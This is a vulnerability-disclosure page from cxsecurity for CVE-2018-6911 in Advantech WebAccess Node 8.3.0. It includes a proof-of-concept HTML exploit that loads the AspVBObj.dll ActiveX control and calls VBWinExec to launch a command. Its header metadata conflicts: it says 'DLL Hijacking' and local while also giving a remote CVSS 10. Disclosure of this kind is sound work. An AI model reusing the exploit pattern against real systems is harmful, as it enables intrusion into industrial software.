Advantech WebAccess Node 8.3.0 DLL Hijacking

2018.02.13
Credit: Nassim Asrir
Risk: Medium
Local: Yes
Remote: No
CVE: CVE-2018-6911
CWE: CWE-78


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Vulnerability Title: Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution Discovered by: Nassim Asrir Contact: wassline@gmail.com / https://www.linkedin.com/in/nassim-asrir-b73a57122/ CVE: CVE-2018-6911 Tested on: IE11 / Win10 Technical Details: ================== The VBWinExec function in Node\AspVBObj.dll in Advantech WebAccess 8.3.0 allows remote attackers to execute arbitrary OS commands via a single argument. Vulnerable File: C:\WebAccess\Node\AspVBObj.dll Vulnerable Function: VBWinExec Vulnerable Class: Include Class Include GUID: {55F52D11-CEA5-4D6C-9912-2C8FA03275CE} Number of Interfaces: 1 Default Interface: _Include RegKey Safe for Script: False RegkeySafe for Init: False KillBitSet: False The VBWinExec function take one parameter and the user/attacker will be able to control it to execute OS command. Function VBWinExec ( ByRef command As String ) Exploit: ======== <title>Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution</title> <BODY> <object id=rce classid="clsid:{55F52D11-CEA5-4D6C-9912-2C8FA03275CE}"></object> <SCRIPT> function exploit() { rce.VBWinExec("calc") } </SCRIPT> <input language=JavaScript onclick=exploit() type=button value="Exploit-Me"><br> </body> </HTML>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top